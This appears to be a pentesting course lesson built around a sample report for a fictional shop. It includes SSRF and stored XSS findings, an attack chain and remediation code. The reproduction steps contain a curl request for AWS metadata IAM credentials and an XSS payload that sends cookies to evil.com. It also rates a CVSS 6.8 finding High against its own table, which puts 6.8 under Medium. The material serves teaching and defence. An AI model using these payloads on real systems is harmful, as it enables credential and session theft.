Advanced Pentest Report

🔥 Vibe Prompt

"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."

Report Template

# Penetration Test Report: Target Application

## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters

### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF → Cloud metadata → IAM keys
- CVSS average: 7.8/10

### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3     |
| High     | 4     |
| Medium   | 3     |
| Low      | 2     |

## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)

## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool

## 4. Findings Detail

### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint does not validate the supplied URL, so an attacker can make the server request the AWS instance metadata service.

**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
```

**Impact:** Full AWS credential compromise → data breach

**Recommendation:**
- Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
- Use an allowlist of approved URLs
- Remove the feature or restrict it to specific domains
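A destination check that implements the first two recommendations (block the private ranges, accept only named hosts on an allowlist, then re-check the address the name resolves to), added here as an example and not part of the report template; the allowlisted domains are hypothetical, and the loopback, 192.168/16 and IPv6 ranges go beyond the three ranges the finding lists.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Ranges the finding recommends blocking, plus 192.168/16, loopback,
# "this network" and the IPv6 equivalents (the extras are an addition here).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "0.0.0.0/8", "::1/128", "fe80::/10", "fc00::/7",
)]

# Hypothetical allowlist: the only hosts the fetch feature may reach.
ALLOWED_HOSTS = {"cdn.example.com", "partner-api.example.com"}


def is_blocked_address(addr: str) -> bool:
    """True if the IP string falls in a blocked range (handles IPv4-mapped IPv6)."""
    ip = ipaddress.ip_address(addr)
    # ::ffff:169.254.169.254 is the metadata address in disguise; unwrap it first.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def check_fetch_url(url: str, resolver=socket.gethostbyname):
    """Return (allowed, reason). `resolver` maps a hostname to an IP string and is
    injectable so the check can be unit-tested without network access."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parsed.scheme!r}"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    # Legitimate targets are named hosts; any IP literal (v4, v6, mapped) is rejected.
    try:
        ipaddress.ip_address(host)
        return False, f"IP literal not allowed: {host}"
    except ValueError:
        pass
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host not on allowlist: {host}"
    # An allowlisted name can still point at an internal address (DNS rebinding),
    # so resolve and re-check; the fetcher must then connect to this exact IP.
    try:
        resolved = resolver(host)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    if is_blocked_address(resolved):
        return False, f"{host} resolves to blocked address {resolved}"
    return True, f"ok: {host} -> {resolved}"
```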

### HIGH: Stored XSS (CVSS 6.8)
**Location:** User profile name field
**Description:** The name field is not sanitized, resulting in stored XSS in the profile.

**Reproduction:**
```http
POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}
```

**Impact:** Session hijacking, admin account takeover

**Recommendation:**
- Sanitize all user input (bleach, DOMPurify)
- Implement Content-Security-Policy
- Use HttpOnly cookies

## 5. Attack Chain Walkthrough

1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata → retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets → customer data exposed
4. [Auth] Weak JWT secret → forged admin token
5. [Impact] Full admin access to customer DB

Total time: 4 hours (automated + manual)

## 6. Risk Matrix

| Impact \ Likelihood | Low | Med | High |
|---------------------|-----|-----|------|
| Critical            | 0   | 1   | 2    |
| High                | 1   | 2   | 1    |
| Medium              | 2   | 1   | 0    |
| Low                 | 2   | 0   | 0    |

## 7. Recommendations by Priority

**P0 (Immediate):**
- Fix SSRF (block private IPs)
- Rotate all IAM keys
- Implement WAF (Cloudflare)

**P1 (This sprint):**
- Sanitize all user inputs (XSS)
- Change JWT secret to 256-bit random
- Rate limit login endpoint

**P2 (Next sprint):**
- Implement CSP headers
- Add security headers (HSTS, X-Frame-Options)
- Move secrets to AWS Secrets Manager

**P3 (Backlog):**
- Regular dependency scanning
- Bug bounty program
- Security training for developers

## 8. Tools Used

| Tool | Purpose |
|------|---------|
| Burp Suite Pro | Web proxy, scanner |
| Nmap | Network scanning |
| Gobuster | Directory brute force |
| Frida | Mobile runtime |
| Nessus | Vulnerability scanning |
| Metasploit | Exploitation |
| Custom Python scripts | Business logic testing |

PenTesting Advanced Course Complete! 🎉

- ✅ Recon & OSINT
- ✅ Exploit Development
- ✅ Web Exploitation
- ✅ Mobile & API
- ✅ Report Writing

## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |

## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest

---

## Penetration Test Reports: From Finding Vulnerabilities to Driving Remediation

A vulnerability that is not documented might as well not exist. The penetration test report is the final deliverable of your work; it determines whether your findings are taken seriously and whether they get fixed.

### The Structure of a Professional Report

1. Executive Summary
    - For management: risk overview, business impact, statistics
2. Technical Details
    - For engineers: reproduction steps, PoC code
3. Risk Rating
    - CVSS score + affected scope + exploitation difficulty
4. Remediation
    - Concrete fix steps, reference resources
5. Appendix
    - Scanner reports, list of tools used

### Vulnerability Risk Levels

| Level | CVSS Score | Description | Fix Deadline |
|:------|:-----------|:------------|:-------------|
| **Critical** | 9.0-10.0 | Direct server takeover possible | 24 hours |
| **High** | 7.0-8.9 | Sensitive data can be read | 7 days |
| **Medium** | 4.0-6.9 | Information disclosure or limited impact | 30 days |
| **Low** | 0.1-3.9 | Information gathering or theoretical risk | 90 days |

### Course Summary

In this advanced penetration testing course you learned exploit development, web vulnerabilities, mobile/API testing and professional report writing. You now have what it takes to run a complete penetration test: the full process from finding vulnerabilities to driving remediation.
